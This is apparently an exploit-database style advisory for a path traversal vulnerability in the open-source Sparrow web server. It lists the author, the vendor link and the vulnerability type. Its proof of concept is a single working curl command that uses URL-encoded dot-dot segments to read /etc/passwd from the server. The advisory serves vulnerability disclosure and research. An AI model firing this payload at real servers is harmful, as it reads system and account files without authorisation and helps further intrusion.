# Title: Sparrow Web Server - Path Traversal # Author: Nassim Asrir # Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ # Researcher At: Henceforth # CVE: N/A # Vendor #: https://github.com/codercheng/sparrow # Download #: https://github.com/codercheng/sparrow # Vulnerability Type#: Path Traversal # Exploit type # Local - Remote # POC #: To exploit this vulnerability use Curl libray: $ curl http://server-ip/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd